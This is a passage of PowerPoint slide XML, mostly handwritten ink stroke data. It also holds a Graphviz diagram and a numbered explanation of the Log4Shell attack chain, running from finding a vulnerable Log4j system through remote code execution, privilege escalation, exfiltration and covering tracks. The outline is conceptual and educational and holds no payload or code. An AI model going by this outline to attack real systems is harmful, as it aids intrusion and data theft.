  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'2'1'0,"0"-1"0,0 1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1 0 0,-1 0 0,0 0 0,2 2 0,18 39 0,-12-16 0,-3-5 0,2-2 0,0 1 0,0-1 0,21 33 0,37 48 0,55 78 0,-96-147 0,-15-19 0,0 0 0,0 0 0,8 17 0,-13-21 0,1 0 0,0 0 0,14 14 0,-13-15 0,0 0 0,-1 0 0,0 1 0,8 13 0,82 200 0,-88-207 0,1 0 0,12 16 0,-14-21 0,0-1 0,-1 1 0,0 0 0,0 1 0,-1-1 0,6 21 0,-11-31-35,1 1 0,-1 0 0,0-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1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2.439"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 261 24575,'0'-2'0,"0"-1"0,1 1 0,-1 0 0,1 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 1 0,1-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,4 0 0,8-4 0,1 1 0,29-4 0,-30 6 0,73-17 0,-56 12 0,-1 0 0,1 2 0,31-1 0,-46 6 14,-1-1-1,1-1 0,-1-1 0,0 0 1,0 0-1,0-2 0,-1 0 1,16-8-1,-24 11-81,0-1 1,-1-1-1,1 1 1,-1-1-1,0 1 1,0-2-1,0 1 1,-1 0-1,1-1 1,-1 0-1,0 0 1,-1 0-1,1-1 1,-1 1-1,0-1 1,0 0-1,-1 0 1,0 0-1,0 0 1,0 0-1,1-11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2.819"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 220 24575,'19'-1'0,"1"-2"0,-1 0 0,0-1 0,0 0 0,0-2 0,30-13 0,-8 4 0,-18 7 0,-10 4 0,1-1 0,-1 0 0,0-1 0,-1 0 0,1-1 0,16-12 0,12-22 0,-33 31 0,1 1 0,0 0 0,14-10 0,-19 16-124,0 1 0,0 0 0,0 0 0,0 0 0,1 1 0,-1 0-1,1 0 1,-1 0 0,1 0 0,5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3.184"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">49 0 24575,'-2'1'0,"1"-1"0,-1 1 0,1 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,1 0 0,-2 3 0,-11 25 0,9-14 0,0 0 0,2 0 0,0 0 0,-1 30 0,9 62 0,-2-79 0,13 50 0,-10-57 0,-2 1 0,-1 0 0,3 45 0,-7-46 0,1 0 0,1 1 0,7 32 0,17 87 0,-19-87 0,4-1 0,19 60 0,-30-112 0,3 8 0,0 0 0,1 0 0,0-1 0,0 1 0,1-1 0,6 9 0,-10-16 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,3 1 0,-2-2 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,2-3 0,24-28-1365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6:07.776"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2 0 24575,'0'1'0,"-1"31"0,1-1 0,1 1 0,2-1 0,2 0 0,0 0 0,11 33 0,-5-29 0,-2-1 0,7 56 0,-6-43 0,2 17 0,-1 12 0,-7-53 0,3 42 0,-5-37 0,8 42 0,0-7 0,-6-43 0,0 1 0,9 25 0,-8-30 0,0 0 0,-1 0 0,-1 1 0,2 26 0,-2-20 0,0-1 0,2 1 0,0-1 0,2 0 0,0 0 0,1-1 0,15 27 0,-15-30 0,0 3 0,-1-1 0,-1 1 0,6 42 0,4 17 0,-3-44 0,-13-35 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,3 0 0,-4-1 0,1 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1-1 0,3-26 0,-3 25 0,1-87-1365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3.563"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 258 24575,'0'-2'0,"0"-1"0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,1-1 0,2-3 0,1 3 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,11-4 0,3-1 0,36-6 0,-36 9 0,-1 0 0,22-9 0,-34 11 0,-1-1 0,1 0 0,-1 0 0,1 0 0,-1-1 0,0 1 0,-1-1 0,1-1 0,0 1 0,6-9 0,-2 0 0,0 1 0,1 0 0,0 1 0,1 0 0,1 1 0,15-11 0,-15 11-1365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03.925"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2 1 24575,'-2'92'0,"4"99"0,9-129 0,-7-44 0,-1 0 0,1 23 0,-4 53 0,-1-46 0,1 0 0,13 80 0,-4-70 0,-7-40 0,0 1 0,2-1 0,0 0 0,8 23 0,12 14 0,3-1 0,51 79 0,-75-127-124,1 0 0,-1 0 0,-1 1 0,0-1 0,0 1 0,0 0-1,0 0 1,-1-1 0,0 1 0,-1 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0.045"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'18'45'0,"-11"-24"0,18 34 0,-17-39 0,-1 0 0,0 0 0,8 32 0,-1 17 0,16 89 0,-24-122 0,18 53 0,-1-8 0,3 75 0,-22-119 0,1 33 0,-5-46 0,2 0 0,0-1 0,1 1 0,1 0 0,11 35 0,-2-17 0,-1 1 0,6 45 0,5 17 0,38 207-96,-43-195-678,-8-57 734,4 109 0,-11-102 466,15 85-1,-9-97-399,-4-29-2,-2-1 1,2 36-1,-2-13-24,2-1 0,18 80 0,-13-80 0,-16-52 0,0 0 0,-1 1 0,0 0 0,-14-13 0,-11-12 0,17 16-1365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1.411"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 350 24575,'0'-3'0,"0"0"0,0 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1 1 0,-1-1 0,1 0 0,5-1 0,6-3 0,0 0 0,0 2 0,31-7 0,-32 9 0,0-1 0,0-1 0,15-6 0,-11 3 0,0 0 0,20-4 0,21-8 0,103-36 0,-103 38 0,-24 8 0,64-8 0,6-1 0,-58 10-369,0 3-1,0 1 1,0 2 0,54 6-1,-4-2 245,181-16 125,-66 2-986,-20 2 139,137-1 847,0 1 0,198-1-1289,-323 13 989,330-2 5355,-494 2-5205,43 7 0,31 2-122,43 2 272,-77-4 0,6-1 0,125 7 0,154-16 911,-361 1-911,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,0 0 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,4 3 0,-3 1 0,1-1 0,-1 0 0,-1 1 0,1 0 0,-1-1 0,0 1 0,2 11 0,4 22 0,-6-28 0,0 0 0,1 0 0,0-1 0,6 15 0,18 38-236,26 96 0,14 37-155,55 106-1194,-63-168 699,-38-91 354,23 67 0,-20-48 532,49 98 0,-23-57 0,40 98 225,-68-150-137,50 138 1019,-47-116-78,65 130-1,-64-149-817,28 90-684,-20-46 322,30 65 151,-57-143-1,0 1 0,-1 0 0,5 36 0,-9-38-1,2 0 1,0 0-1,2 0 1,0-1-1,9 20 1,-5-15 10,-1 2 1,-1 0-1,-1 0 1,7 47 0,0-3 587,-13-67-587,-1-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0-1,0 0 1,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,-1-1-1,1 1 1,-1 0 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0-1-1,0 0 1,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1-1 0,-1 1 0,0 0 0,1-1 0,-1 1 0,0-1-1,-3 1 1,-8 1 64,1 0 1,-1-2-1,0 0 0,-22-2 0,11 1-138,-33-2 64,1 3 0,-1 2 0,-58 11 0,4 1-22,75-11-191,1 2 0,0 1 1,-45 14-1,36-8 213,-1-1 0,-45 4 0,0 1 0,32-7 53,-76 2 1,21-3-1509,-345 3-447,281-13 1567,-2448 2-4440,2538 2 4857,0 3 1,-91 19-1,-96 31 3335,265-53-3342,1 1-1,-1 0 1,1 0-1,0 1 1,-9 5 0,10-5 476,-1 0 0,1-1 0,-1 0 0,-17 5 0,24-8-494,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 0,1 1 0,-1 0 1,1-1-1,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-3 0,0-33 126,1 30-127,1-38-1404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2.325"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">200 0 24575,'0'393'0,"-2"-369"0,0 0 0,-9 33 0,3-11 0,0-7 0,-18 50 0,-4 24 0,11-29 0,-7 47 0,17-75 0,-4 31 0,12-97 0,0 0 0,-1 1 0,0-1 0,-1 0 0,-7-17 0,4 13 0,2 0 0,-1-1 0,2 1 0,-3-19 0,6 32-12,-2-17-181,2 1 0,-1 0-1,2 0 1,0 0 0,1 0-1,6-22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2.738"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'1'4'0,"0"-1"0,1 0 0,-1 1 0,1-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,3 2 0,7 10 0,76 152 0,-33-38 0,-42-97 0,1-3 0,27 47 0,-13-28 0,48 112 0,-7-12 0,-62-131 0,0 0 0,-2 0 0,1 0 0,3 29 0,-4-22 0,12 36 0,-16-55 0,50 118 0,2 1 0,-50-112-94,-9-11 274,-13-15-916,16 11 21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3.213"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 97 24575,'32'-2'0,"1"-1"0,-1-2 0,0 0 0,43-15 0,-72 19 0,225-50 0,-186 42-1365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4.083"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">285 23 24575,'-1'-1'0,"1"0"0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,-2 1 0,-33-4 0,32 4 0,-2-1 0,-1 1 0,1 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,1 0 0,-1 1 0,1-1 0,0 1 0,0 0 0,-9 9 0,3 0 0,0 1 0,1 1 0,0-1 0,2 2 0,-12 26 0,14-28 0,1 0 0,0 1 0,1-1 0,1 1 0,0 0 0,1 0 0,0 0 0,2 1 0,0 16 0,1-10 0,0 0 0,2 0 0,7 31 0,-1-20 0,2-1 0,23 46 0,-29-66 0,14 32 0,-10-20 0,2-1 0,13 21 0,19 11 0,-18-26 0,-21-25 11,0 0 0,0-1 0,1 1 0,-1-1 0,1 0 0,-1 0-1,1 0 1,0-1 0,0 0 0,7 3 0,0-2-382,0 1-1,-1-2 1,20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6.420"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">373 0 24575,'2'6'0,"0"0"0,0 0 0,1 0 0,0 0 0,0-1 0,0 1 0,6 6 0,-7-9 0,3 4 0,0 1 0,-1 0 0,1 0 0,-2 1 0,1-1 0,-1 1 0,-1 0 0,1 0 0,1 12 0,2 8 0,18 53 0,-16-62 0,-1 0 0,-2 1 0,0 0 0,-1 0 0,2 26 0,-5-21 0,-1-11 0,1 0 0,-4 29 0,2-39 0,0-1 0,0 0 0,0 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,0-1 0,0 0 0,-5 5 0,0-3 0,1 0 0,-2-1 0,1 1 0,0-2 0,-1 1 0,0-1 0,1-1 0,-1 1 0,0-2 0,-1 1 0,-15 0 0,-26 5 0,26-3 0,-45 2 0,45-5 0,1 1 0,-28 6 0,45-6 0,-1 0 0,1-1 0,0 0 0,0-1 0,-1 1 0,-9-2 0,15 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 0 0,1 0 0,-1 0 0,1 1 0,-1-4 0,0-8-455,0 0 0,1-23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4:08:17.131"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">2 1 24575,'-1'30'0,"1"2"0,0-1 0,2 1 0,10 48 0,10 63 0,-13-70 0,3 15 0,-7-56 0,-1 0 0,-2 0 0,-1 0 0,-4 38 0,1-25 0,4 50 0,-1-89 0,0 0 0,1-1 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,0 0 0,0-1 0,1 1 0,-1 0 0,1-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,-1 0 0,12 6 0,2 1 0,0-2 0,1 0 0,1-1 0,26 7 0,13 1 0,70 28 0,-110-36 0,53 26 0,-55-24 0,0-2 0,1 0 0,0-1 0,1-1 0,-1-1 0,20 2 0,-16-2 0,-8-2-1365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9F616-DA34-47AE-9587-0A53904A1794}"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FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77688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Log4ShellAttack {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rankdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=LR;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  node [shape=box];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  subgraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cluster_steps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    label="Log4Shell Attack Steps";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    color=black;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    style=dotted;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VulnerableSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [label="1. Identify\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nVulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> System"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExploitVulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [label="2. Exploit\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nVulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProcessPayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [label="3. Process\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nMalicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Payload"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RemoteCodeExecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [label="4. Remote Code\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nExecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [label="5. Privilege\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExfiltrationOrExploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [label="6. Data\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nExfiltration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nFurther</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Exploitation"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [label="7. Covering\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VulnerableSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExploitVulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProcessPayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RemoteCodeExecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ExfiltrationOrExploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CoveringTracks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Identification of a Vulnerable System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: Attackers begin by identifying a target system that utilizes the Apache Log4j library, a common choice for logging in Java applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Exploiting the Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: Attackers craft a malicious payload, which they inject into the target system. This payload is often embedded in user inputs, HTTP request parameters, or other data entry points where Log4j is used for logging.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Processing of Malicious Payload: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When Log4j processes the malicious payload, it inadvertently triggers the vulnerability within the Log4j library. Specifically, it exploits the mishandling of certain log messages with crafted inputs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Remote Code Execution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Due to the vulnerability, the attacker's payload is executed within the context of the application that utilizes Log4j. This allows the attacker to execute arbitrary code on the target system, gaining control over it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
              <a:t>Privilege Escalation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>With control of the target system, the attacker may attempt to escalate privileges to access sensitive data or carry out additional malicious actions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0"/>
